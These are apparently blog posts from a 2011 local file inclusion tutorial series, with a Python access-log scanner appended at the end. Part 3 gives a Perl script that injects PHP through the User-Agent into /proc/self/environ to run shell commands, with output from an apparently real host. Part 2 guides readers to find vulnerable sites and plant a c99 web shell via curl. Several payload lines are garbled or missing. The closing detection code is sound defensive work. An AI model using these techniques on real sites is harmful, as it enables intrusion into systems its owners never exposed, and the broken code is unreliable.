Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request to a PHP page is made, Apache forks (creating a new process) and exec's the PHP binary to actually run/interpret the PHP script. As on every *nix system, each running process has its own /proc entry, which can be quite useful to us, since it holds a lot of information about the process and the environment it is running in.

More specifically, the file /proc/self/environ of a running PHP process contains something like this:

    (X11; U; Linux i686; en-US; rv: Gecko/20061201 Firefox/ Gentoo�HTTP_KEEP_ALIVE=300�

That "Gentoo" is actually part of my browser's user agent. So guess what... imagine that we change the browser's user agent to and make a request like:

You guessed right: it works. The PHP system call is actually executed.

So, after coding this little Perl script:

    #!/usr/bin/perl -w
    use strict;
    use LWP 5.64;
    use LWP::UserAgent;

    my $browser = LWP::UserAgent->new;
    my $url = $ARGV[0];                      # base URL of the vulnerable page, passed as first argument
    my ($line,$response);
    # traverse up to the filesystem root and include the process's own environment
    $url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

    print "jcfsprompt: ";
    while( $line = <STDIN> ) {               # read one command per line from the terminal
        # the user agent wraps the injected PHP between "jcfs" markers (payload garbled in the original post)
        $browser->agent("jcfs /dev/stdout");?>jcfs");
        $response = $browser->get( $url );
        # print only what appears between the two markers, i.e. the command output
        if ($response->content =~ /jcfs(.*)jcfs/s) {
            print $1;
        }
        print "jcfsprompt: ";
    }
I tried something like this...

    jcfs@heaven ~/boxes $ perl
    jcfsprompt: id
    uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
    jcfsprompt: uname -r
    jcfsprompt: pwd
    jcfsprompt: ls -l
    total 2280
    -rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
    -rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
    -rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
    -rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
    drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
    drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin

Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

1. a site vulnerable to LFI
2. PHP knowledge
3. a browser (Mozilla Firefox...)

So... first you find some site vulnerable to LFI... now we must check whether there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D

Now, on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our user agent (Mozilla, Netscape, etc.) and now we must spoof it... but how?

Open a new tab in Mozilla, and type "about:config" (without quotes)...

Now, in "Filter" type: general.useragent.extra.firefox

You will get something like this:

    Preference name                     Status     Type      Value
    general.useragent.extra.firefox     default    string    Firefox/3.0.7

Now, double-click on general.useragent.extra.firefox and replace "Firefox/3.0.7"

If everything is good you will get the shell included... Otherwise, you will get errors... Mostly I was getting the error "URL-File access disabled" or something like that... but using PHP I found another way...

Instead of typing
as the user agent, type this:
Then load your vulnerable page like this:
    -o c99.php
So, let's review... basically, you are just adding the &cmd= thing at the end of the URL...

Now, using the "curl" command you will get the content of the shell in txt format, and by using -o c99.php you will save it as c99.php...

Now simply go to your site like this:
And that's all for now... cheers!
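Both posts above (Part 3 and Part 2) rely on the same request pattern: a ../ traversal string that reaches /proc/self/environ, sometimes a %00 terminator or a trailing &cmd= parameter, and PHP tags carried in the User-Agent header. From the defender's side that pattern is visible in the web server's access log, and the scanner below flags it. This is an added example, not code from the original posts; the log lines, the 203.0.113.0/24 addresses and the indicator names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from the original posts); 203.0.113.0/24 is documentation address space.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Sep/2011:10:01:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"',
    '203.0.113.7 - - [29/Sep/2011:10:02:03 +0000] "GET /index.php?page=../../../../../../proc/self/environ HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 <?php echo 1; ?>"',
    '203.0.113.7 - - [29/Sep/2011:10:02:40 +0000] "GET /index.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron%00&cmd=id '
    'HTTP/1.1" 200 900 "-" "curl/7.21.0"',
    '203.0.113.9 - - [29/Sep/2011:10:03:11 +0000] "GET /index.php?page=contact HTTP/1.1" 200 600 "-" "curl/7.21.0"',
]

def decode(value):
    """Percent-decode twice so single- and double-encoded traversal sequences both normalise."""
    return unquote(unquote(value))

def analyse_line(line):
    """Return {'ip', 'path', 'ua', 'reasons'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, ua = decode(m['path']), decode(m['ua'])
    reasons = []
    if '../' in path or '..\\' in path:
        reasons.append('path traversal')
    if '/proc/' in path:                      # /proc/self/environ, /proc/self/fd/..., etc.
        reasons.append('/proc access')
    if '\x00' in path:                        # %00 used to cut off an extension the script appends
        reasons.append('null byte')
    if re.search(r'<\?(php|=)?', ua):         # PHP open tag smuggled into HTTP_USER_AGENT
        reasons.append('php tag in user-agent')
    if re.search(r'[?&]cmd=', path):          # weak on its own, strong next to the indicators above
        reasons.append('cmd parameter')
    return {'ip': m['ip'], 'path': path, 'ua': ua, 'reasons': reasons}

def scan_log(lines):
    """Return the analysed records that carry at least one indicator, in log order."""
    records = (analyse_line(line) for line in lines)
    return [rec for rec in records if rec and rec['reasons']]
```

Running `scan_log(SAMPLE_LOG)` returns the two requests from 203.0.113.7 with their reasons, so the same client shows up first probing environ with a PHP tag in its user agent and then fetching with a null-terminated path; correlating on the client address like this is what turns two noisy lines into one incident.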